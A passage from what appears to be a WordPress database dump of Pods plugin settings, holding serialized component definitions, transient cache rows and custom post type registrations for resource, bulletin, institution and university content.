templates\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:21:\"Migrate PHP Templates\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:510:\"Pod Pages and Pod Templates will be migrated into their corresponding file-based locations in the theme. This will overwrite existing files and this is one-way. After migrating the files it will clear the PHP code from the DB content. <a href=\"https://docs.pods.io/displaying-pods/pod-page-template-hierarchy-for-themes/\">More information about Pod Page template hierarchy</a> | <a href=\"https://docs.pods.io/displaying-pods/pod-template-hierarchy-for-themes/\">More information about Pod Template hierarchy</a>\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"1.0\";s:8:\"Category\";s:9:\"Migration\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:16:\"Pods_Migrate_PHP\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:37:\"pods-migrate-php/pods-migrate-php.php\";s:8:\"External\";b:0;s:4:\"File\";s:27:\"Migrate-PHP/Migrate-PHP.php\";}s:5:\"pages\";a:28:{s:2:\"ID\";s:5:\"pages\";s:4:\"Name\";s:5:\"Pages\";s:9:\"ShortName\";s:5:\"Pages\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:9:\"Pod Pages\";s:8:\"MenuPage\";s:29:\"edit.php?post_type=_pods_page\";s:11:\"MenuAddPage\";s:33:\"post-new.php?post_type=_pods_page\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:170:\"Creates advanced URL structures using wildcards in order to enable the front-end display of Pods Advanced Content Types. Not recommended for use with other content types.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.3\";s:8:\"Category\";s:8:\"Advanced\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:10:\"Pods_Pages\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:9:\"Pages.php\";}s:22:\"roles-and-capabilities\";a:28:{s:2:\"ID\";s:22:\"roles-and-capabilities\";s:4:\"Name\";s:22:\"Roles and Capabilities\";s:9:\"ShortName\";s:22:\"Roles and Capabilities\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:24:\"Roles &amp; Capabilities\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:379:\"Create and Manage WordPress User Roles and Capabilities; Uses the \'<a href=\"http://wordpress.org/plugins/members/\" target=\"_blank\" rel=\"noopener noreferrer\">Members</a>\' plugin filters for additional plugin integrations; Portions of code based on the \'<a href=\"http://wordpress.org/plugins/members/\" target=\"_blank\" rel=\"noopener noreferrer\">Members</a>\' plugin by Justin Tadlock\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"1.0\";s:8:\"Category\";s:5:\"Tools\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:10:\"Pods_Roles\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:15:\"Roles/Roles.php\";}s:13:\"table-storage\";a:28:{s:2:\"ID\";s:13:\"table-storage\";s:4:\"Name\";s:13:\"Table Storage\";s:9:\"ShortName\";s:13:\"Table Storage\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:13:\"Table Storage\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:108:\"Enable a custom database table for your custom fields on Post Types, Media, Taxonomies, Users, and Comments.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.3\";s:8:\"Category\";s:8:\"Advanced\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:18:\"Pods_Table_Storage\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:17:\"Table-Storage.php\";}s:9:\"templates\";a:28:{s:2:\"ID\";s:9:\"templates\";s:4:\"Name\";s:9:\"Templates\";s:9:\"ShortName\";s:9:\"Templates\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:13:\"Pod Templates\";s:8:\"MenuPage\";s:33:\"edit.php?post_type=_pods_template\";s:11:\"MenuAddPage\";s:37:\"post-new.php?post_type=_pods_template\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:114:\"An easy to use templating engine for Pods. Use {@field_name} magic tags to output values, within your HTML markup.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.3\";s:8:\"Category\";s:8:\"Advanced\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:14:\"Pods_Templates\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:23:\"Templates/Templates.php\";}s:20:\"translate-pods-admin\";a:28:{s:2:\"ID\";s:20:\"translate-pods-admin\";s:4:\"Name\";s:20:\"Translate Pods Admin\";s:9:\"ShortName\";s:20:\"Translate Pods Admin\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:14:\"Translate Pods\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:45:\"Allow UI of Pods and fields to be translated.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"1.1\";s:8:\"Category\";s:4:\"I18n\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:19:\"Pods_Component_I18n\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:13:\"I18n/I18n.php\";}}','off'),(5633378,'_transient_timeout_pods_78c15cdef103b5a4a14d80af881f4923','1782346770','off'),(5633379,'_transient_pods_78c15cdef103b5a4a14d80af881f4923','a:0:{}','off'),(5633380,'_transient_timeout_pods_edc5c53ca45de5f4a68b13a778383134','1782346770','off'),(5633381,'_transient_pods_edc5c53ca45de5f4a68b13a778383134','a:8:{i:0;i:419;i:1;i:2483;i:2;i:714;i:3;i:2388;i:4;i:538;i:5;i:449;i:6;i:418;i:7;i:4907;}','off'),(5633386,'_transient_timeout_pods_4c655dffd1d7363ff247439f59625d3d','1782346819','off'),(5633387,'_transient_pods_4c655dffd1d7363ff247439f59625d3d','a:4:{i:0;i:2453;i:1;i:412;i:2;i:413;i:3;i:465;}','off'),(5633388,'_transient_timeout_pods_3be02303257c42b8d9cade612c3e8390','1782346819','off'),(5633389,'_transient_pods_3be02303257c42b8d9cade612c3e8390','a:0:{}','off'),(5633390,'_transient_timeout_pods_29fa0c0cd16e302e0081b8078bddb986','1782346819','off'),(5633391,'_transient_pods_29fa0c0cd16e302e0081b8078bddb986','a:0:{}','off'),(5633392,'_transient_timeout_pods_0e03f774409ec7d18ae59bc7343a1b41','1782346819','off'),(5633393,'_transient_pods_0e03f774409ec7d18ae59bc7343a1b41','a:0:{}','off'),(5633394,'_transient_timeout_pods_a1f856e425d7317a55cbbbfb642ba003','1782346819','off'),(5633395,'_transient_pods_a1f856e425d7317a55cbbbfb642ba003','a:0:{}','off'),(5633396,'_transient_timeout_pods_e0b69619d9e47bc052077010ac9a33c4','1782346819','off'),(5633397,'_transient_pods_e0b69619d9e47bc052077010ac9a33c4','a:0:{}','off'),(5633398,'_transient_timeout_pods_e495c471ff8e8931032eb2745e37e3d8','1782346819','off'),(5633399,'_transient_pods_e495c471ff8e8931032eb2745e37e3d8','a:0:{}','off'),(5633400,'_transient_timeout_pods_89aefdaa4263509f91783f9bb19e11c6','1782346819','off'),(5633401,'_transient_pods_89aefdaa4263509f91783f9bb19e11c6','a:0:{}','off'),(5633402,'_transient_timeout_pods_4ec1516205837dee3b238de2520b7bbf','1782346819','off'),(5633403,'_transient_pods_4ec1516205837dee3b238de2520b7bbf','a:0:{}','off'),(5633406,'_transient_timeout_pods_pods_wp_cpt_ct-3282','1782346819','off'),(5633407,'_transient_pods_pods_wp_cpt_ct-3282','a:3:{s:10:\"post_types\";a:10:{s:10:\"_pods_page\";b:0;s:14:\"_pods_template\";b:0;s:8:\"document\";a:22:{s:5:\"label\";s:18:\"Document Resources\";s:6:\"labels\";a:35:{s:4:\"name\";s:18:\"Document Resources\";s:13:\"singular_name\";s:17:\"Document Resource\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:19:\"dashicons-portfolio\";s:15:\"capability_type\";s:4:\"post\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:1;s:10:\"can_export\";b:1;s:8:\"supports\";a:4:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:9:\"thumbnail\";i:3;s:10:\"quick-edit\";}s:11:\"has_archive\";b:1;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:8:\"document\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:8:\"document\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";s:10:\"taxonomies\";a:3:{i:0;s:17:\"resource_category\";i:1;s:12:\"resource_tag\";i:2;s:13:\"resource_type\";}}s:13:\"ekms_bulletin\";a:21:{s:5:\"label\";s:14:\"EKMS Bulletins\";s:6:\"labels\";a:35:{s:4:\"name\";s:14:\"EKMS Bulletins\";s:13:\"singular_name\";s:13:\"EKMS Bulletin\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:19:\"dashicons-pressthis\";s:15:\"capability_type\";s:4:\"post\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:0;s:10:\"can_export\";b:1;s:8:\"supports\";a:3:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:10:\"quick-edit\";}s:11:\"has_archive\";b:1;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:13:\"ekms-bulletin\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:13:\"ekms_bulletin\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";}s:11:\"institution\";a:22:{s:5:\"label\";s:12:\"Institutions\";s:6:\"labels\";a:35:{s:4:\"name\";s:12:\"Institutions\";s:13:\"singular_name\";s:11:\"Institution\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:15:\"dashicons-money\";s:15:\"capability_type\";s:4:\"page\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:0;s:10:\"can_export\";b:1;s:8:\"supports\";a:5:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:9:\"thumbnail\";i:3;s:7:\"excerpt\";i:4;s:10:\"quick-edit\";}s:11:\"has_archive\";b:0;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:11:\"institution\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:11:\"institution\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";s:10:\"taxonomies\";a:1:{i:0;s:21:\"institutions_category\";}}s:16:\"knowledge_broker\";a:21:{s:5:\"label\";s:17:\"Knowledge Brokers\";s:6:\"labels\";a:35:{s:4:\"name\";s:17:\"Knowledge Brokers\";s:13:\"singular_name\";s:16:\"Knowledge Broker\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:24:\"dashicons-businessperson\";s:15:\"capability_type\";s:4:\"page\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:0;s:10:\"can_export\";b:1;s:8:\"supports\";a:4:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:9:\"thumbnail\";i:3;s:10:\"quick-edit\";}s:11:\"has_archive\";b:1;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:16:\"knowledge-broker\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:16:\"knowledge_broker\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";}s:12:\"mea_resource\";a:22:{s:5:\"label\";s:13:\"MEA Resources\";s:6:\"labels\";a:35:{s:4:\"name\";s:13:\"MEA Resources\";s:13:\"singular_name\";s:12:\"MEA Resource\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:14:\"dashicons-flag\";s:15:\"capability_type\";s:4:\"page\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:0;s:10:\"can_export\";b:1;s:8:\"supports\";a:5:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:9:\"thumbnail\";i:3;s:7:\"excerpt\";i:4;s:10:\"quick-edit\";}s:11:\"has_archive\";b:0;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:12:\"mea-resource\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:12:\"mea_resource\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";s:10:\"taxonomies\";a:2:{i:0;s:12:\"resource_tag\";i:1;s:13:\"resource_type\";}}s:16:\"project_resource\";a:22:{s:5:\"label\";s:17:\"Project Resources\";s:6:\"labels\";a:35:{s:4:\"name\";s:17:\"Project Resources\";s:13:\"singular_name\";s:16:\"Project Resource\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:19:\"dashicons-pressthis\";s:15:\"capability_type\";s:4:\"post\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:0;s:10:\"can_export\";b:1;s:8:\"supports\";a:5:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:9:\"thumbnail\";i:3;s:7:\"excerpt\";i:4;s:10:\"quick-edit\";}s:11:\"has_archive\";b:0;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:16:\"project-resource\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:16:\"project_resource\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";s:10:\"taxonomies\";a:2:{i:0;s:12:\"resource_tag\";i:1;s:13:\"resource_type\";}}s:13:\"related_topic\";a:22:{s:5:\"label\";s:14:\"Related Topics\";s:6:\"labels\";a:35:{s:4:\"name\";s:14:\"Related Topics\";s:13:\"singular_name\";s:13:\"Related Topic\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s:12:\"search_items\";s:0:\"\";s:9:\"not_found\";s:0:\"\";s:18:\"not_found_in_trash\";s:0:\"\";s:6:\"parent\";s:0:\"\";s:17:\"parent_item_colon\";s:0:\"\";s:8:\"archives\";s:0:\"\";s:10:\"attributes\";s:0:\"\";s:16:\"insert_into_item\";s:0:\"\";s:21:\"uploaded_to_this_item\";s:0:\"\";s:14:\"featured_image\";s:0:\"\";s:18:\"set_featured_image\";s:0:\"\";s:21:\"remove_featured_image\";s:0:\"\";s:18:\"use_featured_image\";s:0:\"\";s:17:\"filter_items_list\";s:0:\"\";s:21:\"items_list_navigation\";s:0:\"\";s:10:\"items_list\";s:0:\"\";s:14:\"item_published\";s:0:\"\";s:24:\"item_published_privately\";s:0:\"\";s:22:\"item_reverted_to_draft\";s:0:\"\";s:14:\"item_scheduled\";s:0:\"\";s:12:\"item_updated\";s:0:\"\";s:14:\"filter_by_date\";s:0:\"\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:18:\"publicly_queryable\";b:1;s:19:\"exclude_from_search\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:17:\"show_in_admin_bar\";b:1;s:9:\"menu_icon\";s:25:\"dashicons-admin-site-alt3\";s:15:\"capability_type\";s:4:\"page\";s:12:\"map_meta_cap\";b:1;s:12:\"hierarchical\";b:0;s:10:\"can_export\";b:1;s:8:\"supports\";a:5:{i:0;s:5:\"title\";i:1;s:6:\"editor\";i:2;s:9:\"thumbnail\";i:3;s:7:\"excerpt\";i:4;s:10:\"quick-edit\";}s:11:\"has_archive\";b:1;s:7:\"rewrite\";a:4:{s:4:\"slug\";s:13:\"related-topic\";s:10:\"with_front\";b:1;s:5:\"feeds\";b:0;s:5:\"pages\";b:1;}s:9:\"query_var\";s:13:\"related_topic\";s:16:\"delete_with_user\";b:1;s:9:\"_provider\";s:4:\"pods\";s:10:\"taxonomies\";a:2:{i:0;s:12:\"resource_tag\";i:1;s:13:\"resource_type\";}}s:10:\"university\";a:24:{s:5:\"label\";s:12:\"Universities\";s:6:\"labels\";a:35:{s:4:\"name\";s:12:\"Universities\";s:13:\"singular_name\";s:10:\"University\";s:9:\"menu_name\";s:0:\"\";s:14:\"name_admin_bar\";s:0:\"\";s:7:\"add_new\";s:0:\"\";s:12:\"add_new_item\";s:0:\"\";s:8:\"new_item\";s:0:\"\";s:4:\"edit\";s:0:\"\";s:9:\"edit_item\";s:0:\"\";s:4:\"view\";s:0:\"\";s:9:\"view_item\";s:0:\"\";s:10:\"view_items\";s:0:\"\";s:9:\"all_items\";s:0:\"\";s